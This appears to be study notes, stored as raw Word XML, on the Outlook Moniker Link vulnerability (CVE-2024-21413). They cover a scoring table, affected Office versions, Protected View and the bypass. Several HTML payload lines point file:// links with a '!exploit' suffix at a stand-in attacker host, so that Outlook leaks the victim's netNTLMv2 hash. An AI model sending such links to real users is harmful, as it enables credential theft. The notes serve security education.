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1B3AA" w14:textId="77777777" w:rsidR="009045CF" w:rsidRPr="009045CF" w:rsidRDefault="009045CF" w:rsidP="009045CF">
      <w:r w:rsidRPr="009045CF">
        <w:t>Moniker Link (CVE-2024-21413)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF736A" w14:textId="71BB879D" w:rsidR="009045CF" w:rsidRDefault="009045CF" w:rsidP="009045CF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441FBB1B" w14:textId="77777777" w:rsidR="008E2B4D" w:rsidRPr="008E2B4D" w:rsidRDefault="008E2B4D" w:rsidP="008E2B4D">
      <w:r w:rsidRPr="008E2B4D">
        <w:t>On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE &amp; credential leak vulnerability with the assigned CVE of </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="008E2B4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2024-21413</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008E2B4D">
        <w:t> (Moniker Link). Haifei Li of Check Point Research is credited with </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="008E2B4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>discovering the vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008E2B4D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059E609" w14:textId="77777777" w:rsidR="008E2B4D" w:rsidRPr="008E2B4D" w:rsidRDefault="008E2B4D" w:rsidP="008E2B4D">
      <w:r w:rsidRPr="008E2B4D">
        <w:t>The vulnerability bypasses Outlook's security mechanisms when handing a specific type of hyperlink known as a Moniker Link. An attacker can abuse this by sending an email that contains a malicious Moniker Link to a victim, resulting in Outlook sending the user's NTLM credentials to the attacker once the hyperlink is clicked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA97F9" w14:textId="77777777" w:rsidR="008E2B4D" w:rsidRPr="008E2B4D" w:rsidRDefault="008E2B4D" w:rsidP="008E2B4D">
      <w:r w:rsidRPr="008E2B4D">
        <w:t>Details relating to the scoring of the vulnerability have been provided in the table below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1663"/>
        <w:gridCol w:w="7353"/>
      </w:tblGrid>
      <w:tr w:rsidR="008374B1" w:rsidRPr="008374B1" w14:paraId="700D4742" w14:textId="77777777" w:rsidTr="008374B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67F8DE5D" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="0064503A">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4078" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51777D43" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="0064503A">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008374B1" w:rsidRPr="008374B1" w14:paraId="2B1BCD5A" w14:textId="77777777" w:rsidTr="008374B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48739999" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>Publish date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4078" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D86EB5" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>February 13th, 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008374B1" w:rsidRPr="008374B1" w14:paraId="37F47CE8" w14:textId="77777777" w:rsidTr="008374B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64A1C6FE" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>MS article</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4078" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5BDB30" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="008374B1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008374B1" w:rsidRPr="008374B1" w14:paraId="7625E780" w14:textId="77777777" w:rsidTr="008374B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39689A29" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4078" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CEEF47A" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>Remote Code Execution &amp; Credential Leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008374B1" w:rsidRPr="008374B1" w14:paraId="232F6C81" w14:textId="77777777" w:rsidTr="008374B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="272F0B05" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4078" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52C6797C" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008374B1" w:rsidRPr="008374B1" w14:paraId="7F848E59" w14:textId="77777777" w:rsidTr="008374B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D625E43" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>Attack Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4078" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71C72287" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008374B1" w:rsidRPr="008374B1" w14:paraId="1E26D4F1" w14:textId="77777777" w:rsidTr="008374B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B55EF89" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>Scoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4078" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AD31058" w14:textId="77777777" w:rsidR="008374B1" w:rsidRPr="008374B1" w:rsidRDefault="008374B1" w:rsidP="008374B1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="008374B1">
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C1BF698" w14:textId="77777777" w:rsidR="009045CF" w:rsidRDefault="009045CF" w:rsidP="009045CF"/>
    <w:p w14:paraId="251164C5" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
      <w:r w:rsidRPr="00A245A3">
        <w:t>The vulnerability is known to affect the following Office releases:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3929"/>
        <w:gridCol w:w="5087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A245A3" w:rsidRPr="00A245A3" w14:paraId="2297A72F" w14:textId="77777777" w:rsidTr="00A245A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2179" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27538D45" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2821" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B5F5048" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A245A3" w:rsidRPr="00A245A3" w14:paraId="22F664E9" w14:textId="77777777" w:rsidTr="00A245A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2179" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF5856D" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:t>Microsoft Office LTSC 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2821" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C0C67CA" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:t>affected from 19.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A245A3" w:rsidRPr="00A245A3" w14:paraId="4F8171BC" w14:textId="77777777" w:rsidTr="00A245A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2179" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6189FEC8" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:t>Microsoft 365 Apps for Enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2821" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06002B15" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:t>affected from 16.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A245A3" w:rsidRPr="00A245A3" w14:paraId="33740AE5" w14:textId="77777777" w:rsidTr="00A245A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2179" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33F52079" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:t>Microsoft Office 2019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2821" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DEBA05D" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:t>affected from 16.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A245A3" w:rsidRPr="00A245A3" w14:paraId="2D30E5C1" w14:textId="77777777" w:rsidTr="00A245A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2179" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05D2B761" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:t>Microsoft Office 2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2821" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FD1C2F3" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRPr="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="00A245A3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A245A3">
              <w:t>affected from 16.0.0 before 16.0.5435.1001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A3BDB52" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="009045CF"/>
    <w:p w14:paraId="7DB2CFD3" w14:textId="77777777" w:rsidR="0045092E" w:rsidRPr="0045092E" w:rsidRDefault="0045092E" w:rsidP="0045092E">
      <w:r w:rsidRPr="0045092E">
        <w:t>Learning Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBDB85" w14:textId="77777777" w:rsidR="0045092E" w:rsidRPr="0045092E" w:rsidRDefault="0045092E" w:rsidP="0045092E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0045092E">
        <w:t>How the vulnerability works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40815F8C" w14:textId="77777777" w:rsidR="0045092E" w:rsidRPr="0045092E" w:rsidRDefault="0045092E" w:rsidP="0045092E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0045092E">
        <w:t>Understand Outlook's "Protected View"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B5CB8" w14:textId="77777777" w:rsidR="0045092E" w:rsidRPr="0045092E" w:rsidRDefault="0045092E" w:rsidP="0045092E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0045092E">
        <w:t>Using the vulnerability to leak credentials from an Outlook client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660D70A" w14:textId="77777777" w:rsidR="0045092E" w:rsidRPr="0045092E" w:rsidRDefault="0045092E" w:rsidP="0045092E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0045092E">
        <w:t>Detection and mitigation measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2ED652" w14:textId="77777777" w:rsidR="00A245A3" w:rsidRDefault="00A245A3" w:rsidP="009045CF"/>
    <w:p w14:paraId="5C22BD0B" w14:textId="5E31D9DB" w:rsidR="00B61C0D" w:rsidRDefault="00B61C0D" w:rsidP="00B61C0D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B61C0D">
        <w:lastRenderedPageBreak/>
        <w:t>Moniker Link (CVE-2024-21413)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC074B8" w14:textId="51CF5981" w:rsidR="006442C8" w:rsidRDefault="006442C8" w:rsidP="001107BB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006442C8">
        <w:t>utlook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006442C8">
        <w:t xml:space="preserve"> can render emails as HTML. You may notice this being used by your favourite newsletters. Additionally, Outlook can parse hyperlinks such as HTTP and HTTPS. However, it can also open URLs specifying applications known as </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="006442C8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Moniker Links</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006442C8">
        <w:t>. Normally, Outlook will prompt a security warning when external applications are triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE0536E" w14:textId="3EB77997" w:rsidR="001107BB" w:rsidRDefault="00670F4D" w:rsidP="001107BB">
      <w:r w:rsidRPr="00670F4D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="178A1493" wp14:editId="2743FFDB">
            <wp:extent cx="5239481" cy="3343742"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="113520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09230" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5239481" cy="3343742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A17841" w14:textId="77777777" w:rsidR="00FE04FA" w:rsidRPr="00FE04FA" w:rsidRDefault="00FE04FA" w:rsidP="00FE04FA">
      <w:r w:rsidRPr="00FE04FA">
        <w:t>This pop-up is a result of Outlook's "Protected View". Protected View opens emails containing attachments, hyperlinks and similar content in read-only mode, blocking things such as macros (especially from outside an organisation). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F36CB" w14:textId="77777777" w:rsidR="00FE04FA" w:rsidRPr="00FE04FA" w:rsidRDefault="00FE04FA" w:rsidP="00FE04FA">
      <w:r w:rsidRPr="00FE04FA">
        <w:t>By using the </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE04FA">
        <w:t xml:space="preserve"> Moniker Link in our hyperlink, we can instruct Outlook to attempt to access a file, such as a file on a network share </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">(&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>="file://ATTACKER_IP/test"&gt;Click me&lt;/a&gt;)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE04FA">
        <w:t>. The SMB protocol is used, which involves using local credentials for authentication. However, Outlook's "Protected View" catches and blocks this attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06344CA9" w14:textId="77777777" w:rsidR="006C4061" w:rsidRPr="006C4061" w:rsidRDefault="006C4061" w:rsidP="006C4061">
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;p&gt;&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>="file://ATTACKER_MACHINE/test"&gt;Click me&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D98AF" w14:textId="77777777" w:rsidR="006C4061" w:rsidRPr="006C4061" w:rsidRDefault="006C4061" w:rsidP="006C4061">
      <w:r w:rsidRPr="006C4061">
        <w:t>The vulnerability here exists by modifying our hyperlink to include the ! special character and some text in our Moniker Link which results in bypassing Outlook’s Protected View. For example: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>="file://ATTACKER_IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>test!exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;Click me&lt;/a&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A872846" w14:textId="77777777" w:rsidR="006C4061" w:rsidRPr="006C4061" w:rsidRDefault="006C4061" w:rsidP="006C4061">
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;p&gt;&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>="file://ATTACKER_MACHINE/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>test!exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4061">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;Click me&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20CFD5" w14:textId="77777777" w:rsidR="006C4061" w:rsidRPr="006C4061" w:rsidRDefault="006C4061" w:rsidP="006C4061">
      <w:r w:rsidRPr="006C4061">
        <w:t>We, as attackers, can provide a Moniker Link of this nature for the attack. Note the share does not need to exist on the remote device, as an authentication attempt will be attempted regardless, leading to the victim's Windows netNTLMv2 hash being sent to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD20662" w14:textId="77777777" w:rsidR="006C4061" w:rsidRDefault="006C4061" w:rsidP="006C4061">
      <w:r w:rsidRPr="006C4061">
        <w:t>Remote Code Execution (RCE) is possible because Moniker Links uses the Component Object Model (COM) on Windows. However, explaining this is currently out of scope for this room, as there is no publicly released proof of concept for achieving RCE via this specific CVE.</w:t>
      </w:r>
    </w:p>
